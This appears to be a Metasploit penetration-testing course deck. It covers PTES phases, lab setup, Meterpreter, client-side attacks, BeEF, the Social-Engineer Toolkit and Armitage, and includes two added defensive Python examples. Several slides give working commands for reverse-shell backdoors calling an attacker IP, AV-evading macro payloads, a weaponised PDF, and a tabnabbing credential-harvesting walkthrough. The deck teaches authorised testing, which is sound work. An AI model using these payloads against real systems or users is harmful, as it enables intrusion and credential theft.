
Penetration Testing with METASPLOIT

Course Introduction

Course Outline
• Introduction to Penetration Testing
• Setting up Penetration Testing Lab
• Metasploit 101
• Meterpreter
• Writing custom Meterpreter scripts
• Client side attacks
• Exploiting client side vulnerabilities
• Exploiting browser based vulnerabilities
• Post exploitation
• Armitage
• Social Engineering Toolkit
• PowerSploit

Introduction to Penetration Testing

Introduction to Penetration Testing
“Penetration testing: a method of evaluating the security of a computer system or network by simulating an attack”
Importance: penetration tests are valuable for several reasons
• Determining the feasibility of a particular set of attack vectors
• Identifying higher-risk vulnerabilities which could lead to a security breach
• Identifying vulnerabilities
• Testing the ability of network defenders
• Providing evidence to support increased investments in security personnel and technology

Penetration Testing Execution Standard
PTES (Penetration Testing Execution Standard)
• Aimed to provide security standards for business organizations and security service providers
• Lays down a standard for performing penetration tests (Beta)
Penetration Testing Execution Methodology
• Pre-engagement Interactions
• Intelligence Gathering
• Threat Modeling
• Vulnerability Analysis
• Exploitation
• Post Exploitation
• Reporting
Source: http://www.pentest-standard.org/

Pre-Engagement Interactions
• Mainly involves client interaction
• Engagement interactions
• Agenda focuses on the penetration testing road map
• Questionnaires
• Payment terms

Intelligence Gathering
• Main attribute is reconnaissance (information gathering) in a penetration test
• Reflects on the other stages of penetration testing
• Different tools and scripts will be used for different platforms for information gathering

Threat Modeling
Depends on the intelligence gathered and the pre-engagement information
Methodology
• Business Asset Analysis
• Business Process Analysis
• Threat Agents/Community Analysis
• Threat Capability Analysis
• Motivation Modeling
• Finding relevant news of comparable organizations being compromised

Vulnerability Analysis
• Involves discovering flaws in the target system
• Different tools and scripts will be used for performing vulnerability analysis on different platforms
• A threat level classification needs to be created for the exploitation phase
• Priority should be given by threat level; threats need to be analyzed and exploited
• Directly reflects in the exploitation phase

Exploitation
• Completely depends on the vulnerability analysis phase and mainly focuses on target exploitation
• Exploits the target with the appropriate exploit, with a compatibility check
• Pentester needs to evade security systems: needs to bypass them and trigger the exploit for successful exploitation

Post Exploitation
• Involves extending the attack
• Pen-tester can analyze further information during post exploitation
• Might include juicy information
• Using the post exploitation phase, the attacker can enhance his persistence on the compromised system

Reporting
• Consists of a penetration testing executive summary and a technical report
• Executive summary mainly focuses on threat level severity, general findings, recommendation summary and road map
• Technical report carries out how vulnerability analysis, exploitation and post exploitation have been done
• Based on the report, the technical team can further move towards patch management

Setting up Penetration Testing Lab

Setting up Penetration Lab
• Will be focusing on creation of our own virtual test beds and third-party ones
• Every test bed has been added with multiple vulnerabilities
• Everything will be on the safe side (no loss)
• Running with different sets of operating systems with different sets of configurations with added vulnerabilities

Lab Setup Overview

Virtualization
Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network resources. --Wikipedia
Requirements for creating a virtualization environment
• Virtualization software (VirtualBox, VMware, Hypervisor)
• RAM (minimum 4GB)
• Good processor, above 2.8GHz
• Virtual test beds or operating system installer ISO images

Buzz Words
Host Operating System: The main operating system which is installed on a computer system
Guest Operating System: Any operating system which is installed by using virtualization software
Snapshot: Saving the state of a virtual machine
Clone: Copying the state of a virtual machine

Installing and Setting up Virtual Lab

Snapshot and Cloning

METASPLOIT 101

Metasploit 101
• Introduces Metasploit Framework
• Buzzwords, Framework Architecture, Interfaces and Modules
• Scope for exploiting target vulnerability using built-in exploits and payloads

Buzz Words
Vulnerability: Weakness existing in a system which could be compromised
Exploit: Code which works on the target vulnerable system
Payload: Actual code that lets an attacker gain access after exploitation

Penetration Testing using Metasploit
• Widely used tool for development and testing of vulnerabilities
• Buzzing word in the security community
• Used for: Penetration testing, IDS signature development, Exploit development

Why opt for Metasploit
• Widely accepted tool for testing vulnerabilities
• Makes complex tasks easier
• Possesses a rich set of modules organized in a systematic manner
• Has regular updates
• Contains different types: 1000+ exploits, 200+ payloads, 500+ auxiliary modules

Metasploit Architecture
Libraries: REX, MSF CORE, MSF BASE
Interfaces: Console, CLI, Web, GUI, Armitage
Tools and Plugins
Modules: Payloads, Exploits, Encoders, Post-Mods, Auxiliary

Exploits
• Actual code which works on the target vulnerable system
• MSF has modular organization of exploits based on OS and service classification
Exploit Ranking Values
1. ManualRanking
2. LowRanking
3. AverageRanking
4. NormalRanking
5. GoodRanking
6. GreatRanking
7. ExcellentRanking
Source: https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking


Exploit Rankings
1. ManualRanking: Exploit is so unstable or difficult to exploit and is basically a DoS
2. LowRanking: Exploit is nearly impossible to exploit (or under 50%) for common platforms
3. AverageRanking: Exploit is generally unreliable or difficult to exploit; then AverageRanking should be used
4. NormalRanking: Exploit is otherwise reliable, but depends on a specific version and can't reliably auto-detect
5. GoodRanking: Exploit has a default target and it is the "common case" for this type of software
6. GreatRanking: Exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check
7. ExcellentRanking: Exploit will never crash the service
Source: https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
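The ranking scale matters in practice when choosing which modules a tester may run against a production system: a crash-prone module is a risk to the client, not just to the test. As an added example (not code from the slides or from the Metasploit project), the Python below parses a msfconsole `search`-style listing and keeps only the modules at or above a chosen rank. The listing and the module names in it are constructed placeholders; the numeric rank values are the constants Metasploit itself assigns to the seven levels, and the function names are this example's own.

```python
import re

# Metasploit's ranking constants (lib/msf/core/module/rank.rb): a higher value
# means a more reliable exploit. The order matches the seven levels on the slide.
RANK_VALUE = {
    "manual": 0,
    "low": 100,
    "average": 200,
    "normal": 300,
    "good": 400,
    "great": 500,
    "excellent": 600,
}

# Constructed sample shaped like msfconsole's `search` listing. The module
# names and descriptions are placeholders, not real Metasploit modules.
SAMPLE_SEARCH_OUTPUT = """\
Matching Modules
================

   Name                                       Disclosure Date  Rank       Description
   ----                                       ---------------  ----       -----------
   exploit/windows/fileformat/example_one     2010-01-01       good       Placeholder file format module
   exploit/windows/browser/example_two        2011-05-05       normal     Placeholder browser module
   exploit/windows/fileformat/example_three   2012-03-03       excellent  Placeholder reliable module
   exploit/windows/smb/example_four                            manual     Placeholder module without a date
"""

# One module per line: module name, optional disclosure date, rank word, description.
LINE_RE = re.compile(
    r"^\s*(?P<name>(?:exploit|auxiliary|post)/\S+)\s+"
    r"(?:(?P<date>\d{4}-\d{2}-\d{2})\s+)?"
    r"(?P<rank>manual|low|average|normal|good|great|excellent)\s+"
    r"(?P<desc>.*\S)\s*$"
)


def parse_search_output(text):
    """Turn a `search` listing into a list of dicts; header and separator lines are skipped."""
    modules = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:
            modules.append(match.groupdict())   # 'date' is None when the column is empty
    return modules


def modules_ranked_at_least(modules, min_rank):
    """Keep modules whose rank is >= min_rank, most reliable first, then by name."""
    if min_rank not in RANK_VALUE:
        raise ValueError(f"unknown rank {min_rank!r}")
    threshold = RANK_VALUE[min_rank]
    kept = [m for m in modules if RANK_VALUE[m["rank"]] >= threshold]
    return sorted(kept, key=lambda m: (-RANK_VALUE[m["rank"]], m["name"]))


if __name__ == "__main__":
    # Typical use: only consider modules that are at least "good" for a live engagement.
    for m in modules_ranked_at_least(parse_search_output(SAMPLE_SEARCH_OUTPUT), "good"):
        print(f'{m["rank"]:<10} {m["name"]}')
```

The threshold is the decision a tester records in the engagement notes: anything below it is either skipped or only run against a lab copy of the target.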

Payloads
• Singles: self-contained payloads that do a specific task
• Stagers: bridge the connection establishment
• Stages: payload components that are downloaded by stager modules


Post Exploitation
• Critical component of a penetration test
• Assists the pen tester in gathering information about the exploited system
• Enhances the attack in the targeted environment
• Can be extended in the pivoting stage
• MSF has built-in and external scripts to perform post exploitation
• Varies for different OS types


Auxiliary Modules
MSF Auxiliary contains a wide variety of modules related to different services, used for doing specific tasks
Auxiliary module types: admin, crawlers, scanners, fuzzers, sniffers ...
Example: scanning for available directories existing on a web server


MSF Tools and Plugins
• MSF contains built-in and third-party tools which are widely used during regular pentests at runtime
• Importing a Nessus scan report, which can later be used for launching an attack based on the report
• Built-in MSF tools come in handy especially during the post exploitation phase. Ex: memdump

MSF Tools

MSF Plugins

MSF Interfaces
• Console
• CLI
• Web
• GUI
• Armitage

Present Scenario

If exploit and payload get executed

Meterpreter

Meterpreter
meterpreter >
• It's the default go-to payload for Windows
• Provides an enhanced command shell for the attacker
• Consists of a default set of core commands
• Can be extended at runtime by shipping DLLs to the victim machine
• Provides a basic post-exploitation API

Working of Meterpreter
Getting a Meterpreter shell undergoes 3 different stages
1. Sends exploit + Stage 1 payload
2. Sends DLL injection payload
3. Meterpreter DLL starts communication
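The second step above, where the stager pulls down the Meterpreter DLL (the "stage" in the Payloads slide's terms), is the part of the process a network defender can observe: for the reverse_tcp stager the handler sends the stage length as a 4-byte little-endian integer and then the stage itself, and the Meterpreter stage starts with the PE "MZ" magic. As an added example, not code from the slides or from the Metasploit project, the Python below checks the first server-to-client bytes of a connection for that shape and carves the stage out of a complete capture so it can be handed to a malware analyst. The byte streams are constructed (the "DLL" is filler, not a real payload), the size bounds are this example's own assumption about realistic stage sizes, and `inspect_stage_delivery` and `carve_stage` are names chosen here.

```python
import struct

# Constructed sample (not captured from a real session): a staged-payload
# delivery shaped like a Metasploit reverse_tcp handler's reply. The handler
# first sends the stage length as a 4-byte little-endian integer, then the
# stage; for Meterpreter the stage is the metsrv DLL, so it begins with the
# PE "MZ" magic. The DLL body below is filler, not real code.
FAKE_DLL = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 4000
STAGED_STREAM = struct.pack("<I", len(FAKE_DLL)) + FAKE_DLL

# Contrast case: ordinary server-to-client traffic on the same port.
BENIGN_STREAM = b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"


def inspect_stage_delivery(server_bytes, min_stage=1024, max_stage=16 * 1024 * 1024):
    """Classify the first bytes a server sent on a freshly opened TCP connection.

    Returns None when the stream does not match the staging pattern, otherwise a
    dict with the declared stage length, how much of it has been observed so far,
    and whether the whole stage was delivered. The size bounds are assumptions:
    real stages are tens of KB to a few MB, and ASCII protocols such as HTTP
    decode to absurd lengths, which rules them out before the "MZ" check.
    """
    if len(server_bytes) < 6:            # need the length prefix plus "MZ"
        return None
    (declared,) = struct.unpack("<I", server_bytes[:4])
    body = server_bytes[4:]
    if not (min_stage <= declared <= max_stage):
        return None
    if not body.startswith(b"MZ"):
        return None
    return {
        "declared_len": declared,
        "observed_len": min(len(body), declared),
        "complete": len(body) >= declared,
    }


def carve_stage(server_bytes):
    """Return the delivered DLL bytes when the stream carried a complete stage, else None."""
    match = inspect_stage_delivery(server_bytes)
    if match is None or not match["complete"]:
        return None
    return server_bytes[4:4 + match["declared_len"]]


if __name__ == "__main__":
    for label, stream in (("staged", STAGED_STREAM), ("benign", BENIGN_STREAM)):
        print(label, inspect_stage_delivery(stream))
```

Feed the function the reassembled server-side bytes of each new connection (for example from a Zeek or Suricata file-extraction hook); a match on a port that is not supposed to serve binaries is a strong signal that a stager has called home, and the carved DLL is the artifact to analyze.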

Working with Meterpreter
Covers usage of Meterpreter
• Meterpreter basics
• Core Commands
• File System Commands
• Networking Commands
• System Commands
• User Interface Commands

Launching Attack
Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Present Scenario

If exploit and payload get executed

Core Commands

File System Commands

Networking Commands

System Commands

User Interface Commands

Client Side Attacks

Introduction to Client Side Attacks
• Targets exploitation of client side vulnerabilities
• Cracks the perimeter from the client side work environment
• Includes: Email, Java, Office suite, 3rd party applications, Browsers
• Whole agenda focuses on client side exploitation: client side software, exploiting vulnerable services exposed to hostile servers

Lab Environment
• Contains different set of operating systems
• Preconfigured and added vulnerabilities
• Scenario based
  • Different stages
  • Security levels
• Goal is to Pwn

Agenda
Exploiting:
• Software based vulnerabilities
• Web based vulnerabilities
• Browser based vulnerabilities

Introduction to Client Side Attacks
Level    PATCHED  ANTIVIRUS  FIREWALL
STAGE 1  NO       NO         NO
STAGE 2  NO       NO         YES
STAGE 3  NO       YES        YES
STAGE 4  YES      YES        YES

Stage -1
Level    PATCHED  ANTIVIRUS  FIREWALL
STAGE 1  NO       NO         NO

Attacker creates a backdoor and deploys it on an unprotected system, where
Anti Virus : Absent
Updates    : Absent
Firewall   : Absent


Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Time for Demo
Victim / Attacker

Exploiting Client Side Vulnerabilities

Exploiting Client-Side Vulnerabilities
Agenda
• Introduction to MSF Payloads
• Exploiting MS-Office suite programs using custom macros
• Msfpayload, Msfencode, Msfvenom
• Exploiting Word and PDF documents
• Introduction to binary payloads
• Introduction to Veil framework
• Creating custom binary payload types
• Analyzing custom binary payloads using Veil framework
• File format exploits
• Porting exploits and exploiting client side vulnerabilities
• Encoding payloads into VBA code
• Making persistent backdoors

Introduction to MSF Payloads
• MSF contains different payloads with different sets of options
• Built in with a custom set of commands
• Everything depends on payload suppleness
• Focus on exploit development and exploitation on different OS platforms depending on vulnerability existence

Msfpayload, Msfencode, Msfvenom
Msfpayload: The msfpayload module is used for creating custom executables and for shellcode generation in different formats.
Msfencode: Shellcode generated by msfpayload contains null characters; shellcode which is deployed or passed over a network might lead to AV / IDS & IPS detection. The msfencode module helps in avoiding bad characters.
Msfvenom: Msfpayload + Msfencode = Msfvenom

Binary Payload
• Developed by using msfpayload
• Requires a bit of social engineering
• Attacker needs to create an exe file and send it to the victim machine
• On the attacker side a listener should be enabled
• Whenever the victim opens the exe, the connection gets established

DEMO
Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.206.159 LPORT=44444 X > /var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Exploiting File Format Vulnerabilities
• A user's desktop environment contains various software applications and networking services
• Might contain outdated applications or poorly configured security services
• Client side exploitation can be easily done by using any one of the following: Email, Java, Office suite, 3rd party applications, Browsers

Exploiting MS-Office Suite Programs

Shellcode execution in MS-Office Macros
Stage : 1 Creating shellcode + payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.159.132 LPORT=443 -e x86/shikata_ga_nai -i 5 -f vba > vba.txt
Stage : 2 Enabling listener to connect back to attacker's machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 443
msf > exploit

Exploiting PDF Documents

Exploiting PDF Documents
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 4444
msf > set INFILENAME /root/password.pdf
msf > exploit
SHARE THE PDF FILE WITH VICTIM
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.132
msf > set LPORT 4444
msf > exploit

Exploiting Software Based Vulnerabilities

Exploiting Software based Vulnerabilities
Agenda
• Introduction to software based vulnerabilities
• Analyzing how to exploit a fully patched system
• Analyzing and exploiting software vulnerabilities

Introduction to software based vulnerabilities
• Targets exploitation of client side vulnerabilities
• Cracks the perimeter from the client side work environment
• Whole agenda focuses on client side exploitation: client side software, exploiting vulnerable services
Source: http://www.exploit-db.com/

Analyzing how to exploit fully patched machine
Level    PATCHED  ANTIVIRUS  FIREWALL
STAGE 1  NO       NO         NO
STAGE 2  NO       NO         YES
STAGE 3  NO       YES        YES
STAGE 4  YES      YES        YES

Analyzing how to exploit fully patched machine
• Let's check for any vulnerable service running on the victim's machine
• We will exploit core software based vulnerabilities

Victim Environment

Analyzing and Exploiting Vulnerability

Exploiting Browser Based Vulnerabilities

Exploiting Browser based Vulnerabilities
Agenda
• Introduction to browser based vulnerabilities
• Exploiting browser based vulnerabilities using Metasploit
• Introduction to Browser Exploitation Framework (BeEF)
• Installing and Configuring Beef on attacker machine
• Exploiting browser based vulnerabilities using BeEF

Introduction to Browser Attacks
A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an
operating system or piece of software with the intent to breach browser security to alter a user's browser
settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript,
and other Web technologies and cause the browser to run arbitrary code.

-- Wikipedia

Exploitation of Browser Vulnerabilities using MSF
• User environment might be running an outdated browser
• Victim needs to browse the attacker's shared URL
• Once the victim navigates to the attacker's URL, the victim's machine gets exploited and connection establishment takes place

Exploitation of Browser Vulnerabilities using MSF

Browser Exploitation Framework (BeEF)
Open source tool for testing and exploiting web application and browser-based vulnerabilities. Testing and exploitation will be done from the client side.
Features
• BeEF's modular framework allows addition of custom browser exploitation commands. The extension API allows users to change BeEF's core behavior.
• Keystroke logging
• Browser proxying
• Integration with Metasploit
• Plugin detection
• Intranet service exploitation
• Phonegap modules
• Hooking through QR codes
• Social Engineering modules spur user response such as entering sensitive data and responding to reminders to update software
• RESTful API allows control of BeEF through HTTP requests (JSON format)
Source: http://en.wikipedia.org/wiki/BeEF

Browser Exploitation Framework (BeEF) Architecture © BeEF Project

Installing and Configuring BeEF
Installation
root@kali: apt-get update
root@kali: apt-get install beef-xss
Configuring
Edit config.yaml and set Metasploit : true
vi /usr/share/beef-xss/config.yaml
Add the Kali Linux IP at lines 18 and 26:
host: "192.168.159.132"
callback_host: "192.168.159.132"
vi /usr/share/beef-xss/extensions/metasploit/config.yaml
Add the msf framework path at line 37:
{os: 'custom', path: '/usr/share/metasploit-framework/'}
Launching
root@kali: cd /usr/share/metasploit-framework/
msf> load msgrpc ServerHost=192.168.159.132 Pass=abc123
root@kali: cd /usr/share/beef-xss/
root@kali: ./beef


Time for Demo

Social Engineering Toolkit (S.E.T.)

Social Engineering Toolkit
Agenda
• Introduction to social engineering
• Introduction to SET
• Installing and configuring Social Engineering Toolkit
• Working on SET modules and launching attacks using SET

Social Engineering

“The human factor is truly security’s weakest link”

Kevin Mitnick

Motivation
Self Interest
Mr. X wants to access and/or modify information that is associated with a family member, colleague or even a neighbor.

Revenge
Mr. X targets a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance.

Curiosity
Mr. X, receiving pressure from friends, family or organized crime syndicates for reasons such as financial gain,
self-interest and/or revenge.

The Root Cause
People want to be helpful
Sometimes the help goes too far and they give away too much information.
People want to avoid confrontation
It's difficult for some people to ask others to prove who they are. They don't want confrontation.
People like convenience
No one wants to be put out by additional security even though it may benefit the organization.
People are messy
By nature, they leave paper around, copy multiple people on e-mail, and leak data.
People are curious.
A great example is an employee who finds a USB drive in the parking lot. The first thing they do when they get to
their desk is plug it in to see what's on it.
People appeal to the senses.
Building a relationship with a sweet voice.

Life Cycle of Social Engineering

Introduction to SET
• Social-Engineer Toolkit (SET) created and written by Dave Kennedy, the founder of TrustedSec
• Focuses on exploiting human weakness
• Interfaces: Command line, Web

Introduction to Command-line Interface

Introduction to Web Interface

Working on SET modules & launching attacks using SET
Performing Tabnabbing attack using SET
Tabnabbing Attack

Introduction to Tabnabbing
"It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security. It's like being hit by the wrong end of the sword."
Aza Raskin, http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Behind the Curtains
The attacker uses customized scripts and a hosting service to pretend to be the original page.
How to do it: the hosting site holds Index-1.html, Index-2.html, Tabnab.html, Script.js, Log.php and Log.txt

Tabnabbing using SET
root@kali:/ cd /usr/share/set/
root@kali:/usr/share/set/ ./settoolkit
1. Social Engineering Attacks
2. Website Attack Vectors
4. Tabnabbing
2. Site Cloner
Enter the attacker's IP
Enter the URL to clone
The victim should open the attacker's URL and then switch to a new tab. Whatever tab was opened in the background gets refreshed and loads the phishing page. If the victim supplies credentials there, they are posted back to the attacker's machine.


Captured Credentials

Armitage

Armitage
Agenda
• Introduction to Armitage
• Installing and configuring Armitage
• Host Management
• Dynamic Workspaces
• Importing Hosts
• Scanning and exploiting targets
• Exploit Automation

Introduction to Armitage
GUI front-end for the Metasploit Framework developed by Raphael Mudge
Installation and Configuring
Kali Linux ships with built-in Armitage and all the dependencies.
root@kali: service postgresql start
root@kali: service metasploit start
root@kali: armitage

Launching Armitage

Armitage UI

Adding Host

Scanning Host

Finding Attacks

Launching Attack

Compromised System

Thank You